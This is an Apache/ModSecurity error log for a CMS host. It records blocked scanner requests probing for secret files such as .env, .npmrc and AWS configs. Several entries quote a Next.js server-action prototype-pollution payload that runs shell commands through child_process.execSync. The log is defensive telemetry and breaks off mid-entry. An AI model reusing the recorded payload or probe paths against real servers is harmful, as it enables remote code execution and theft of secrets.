"([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.gitlab-ci.yml"] [unique_id "aTQxmzVNQf_oW9-JXCpPyAAAAJA"], referer: https://www.google.com/ [Sat Dec 06 15:37:31.640584 2025] [:error] [pid 27206:tid 27287] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/config.json"] [unique_id "aTQxmzVNQf_oW9-JXCpPyQAAAJc"], referer: https://www.google.com/ [Sat Dec 06 15:37:31.830654 2025] [:error] [pid 27206:tid 27285] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/config.js"] [unique_id "aTQxmzVNQf_oW9-JXCpPygAAAJY"], referer: https://www.google.com/ [Sat Dec 06 15:37:32.010154 2025] [:error] [pid 27206:tid 27264] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/aws-config.js"] [unique_id "aTQxnDVNQf_oW9-JXCpPywAAAIs"], referer: https://www.google.com/ [Sat Dec 06 15:37:32.141930 2025] [:error] [pid 27206:tid 27257] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/aws.config.js"] [unique_id "aTQxnDVNQf_oW9-JXCpPzAAAAIc"], referer: https://www.google.com/ [Sat Dec 06 15:37:32.248737 2025] [:error] [pid 27206:tid 27259] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.npmrc"] [unique_id "aTQxnDVNQf_oW9-JXCpPzQAAAIg"], referer: https://www.google.com/ [Mon Dec 08 11:38:25.882935 2025] [:error] [pid 16540:tid 16561] [client 98.92.218.27:49670] [client 98.92.218.27] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env"] [unique_id "aTackRZS7M1OqokKpiVCMgAAANM"] [Mon Dec 08 14:48:00.192863 2025] [:error] [pid 30812:tid 30863] [client 52.89.200.61:44638] [client 52.89.200.61] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env"] [unique_id "aTbJANSextkjCJfEVFPaUgAAAIU"] [Tue Dec 09 18:06:26.303121 2025] [:error] [pid 10047:tid 10070] [client 3.96.200.128:51684] [client 3.96.200.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aThJAm-neFT78GCR9wiSBwAAANQ"] [Wed Dec 10 18:44:45.096738 2025] [:error] [pid 3563:tid 3576] [client 216.73.216.21:9476] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/common-base-color.php on line 3 [Wed Dec 10 18:48:14.558616 2025] [autoindex:error] [pid 8150:tid 8173] [client 216.73.216.21:3524] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/img [Wed Dec 10 18:48:14.711275 2025] [:error] [pid 8150:tid 8165] [client 216.73.216.21:54172] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/lawyer-base-color.php on line 3 [Wed Dec 10 21:19:20.373587 2025] [:error] [pid 3655:tid 3676] [client 216.73.216.21:25357] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/common-base-color.php on line 3 [Wed Dec 10 21:22:23.207288 2025] [autoindex:error] [pid 3928:tid 3931] [client 216.73.216.21:60254] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.cms-1.dev-unit.com/assets/front/img [Wed Dec 10 21:22:23.336205 2025] [:error] [pid 3655:tid 3675] [client 216.73.216.21:55007] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/lawyer-base-color.php on line 3 [Thu Dec 11 19:07:59.163722 2025] [:error] [pid 11440:tid 11484] [client 35.86.189.193:44036] [client 35.86.189.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aTr6b-KYL8Nz2WvbYONbnwAAAVc"] [Thu Dec 11 19:59:07.243702 2025] [:error] [pid 11440:tid 11461] [client 216.73.216.61:64598] [client 216.73.216.61] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aTsGa-KYL8Nz2WvbYONxFwAAAUA"] [Thu Dec 11 23:00:48.639451 2025] [:error] [pid 5306:tid 5369] [client 216.73.216.61:17578] [client 216.73.216.61] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aTsxANjp4gorx3NZH71UXAAAAQo"] [Sat Dec 13 12:19:26.039517 2025] [core:error] [pid 875:tid 882] [client 216.73.216.87:30763] AH10244: invalid URI path (/rss/Iceland-lab%27s-testing-suggests-50%-of-cases-have-no-symptoms/21) [Mon Dec 15 09:47:24.362236 2025] [:error] [pid 14112:tid 14131] [client 74.7.242.43:38074] [client 74.7.242.43] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aT-9DMCVC_ji-tlSeleZVgAAAQo"] [Mon Dec 15 09:48:05.253387 2025] [autoindex:error] [pid 8330:tid 8353] [client 74.7.242.43:58044] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 15 09:50:42.492938 2025] [core:error] [pid 8330:tid 8352] [client 74.7.242.43:35542] AH10244: invalid URI path (/assets/front/js/%url%) [Tue Dec 16 02:56:56.178604 2025] [:error] [pid 8121:tid 8223] [client 74.7.241.61:50306] [client 74.7.241.61] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aUCuWHb9og640vSGMx5jIQAAAFc"] [Tue Dec 16 02:57:35.801383 2025] [autoindex:error] [pid 8122:tid 8216] [client 74.7.241.61:50704] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 16 03:00:33.036439 2025] [core:error] [pid 8121:tid 8215] [client 74.7.241.61:42142] AH10244: invalid URI path (/assets/front/js/%url%) [Tue Dec 16 16:07:13.120642 2025] [:error] [pid 23733:tid 23790] [client 85.9.207.35:45216] [client 85.9.207.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUFnkfszPqr_jbGu4RjUywAAAtA"] [Tue Dec 16 17:41:02.796441 2025] [:error] [pid 23950:tid 24153] [client 52.53.246.137:35876] [client 52.53.246.137] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aUF9jpsusC3Icyr137B90gAAA4s"] [Tue Dec 16 18:33:55.411410 2025] [:error] [pid 16797:tid 16870] [client 63.177.50.229:34294] [client 63.177.50.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aUGJ84wdxKC99oXxvA8ZRAAAApA"] [Wed Dec 17 00:49:51.337931 2025] [:error] [pid 15965:tid 15983] [client 54.255.35.94:55724] [client 54.255.35.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aUHiDza5mPfRgEk0q4YLfwAAAEo"] [Wed Dec 17 11:58:54.813407 2025] [:error] [pid 24529:tid 24556] [client 85.9.207.35:56950] [client 85.9.207.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUJ-3mKW6pmaAbFK8bfv1AAAAQ0"] [Thu Dec 18 02:13:16.218288 2025] [:error] [pid 24529:tid 24548] [client 134.209.251.226:57866] [client 134.209.251.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 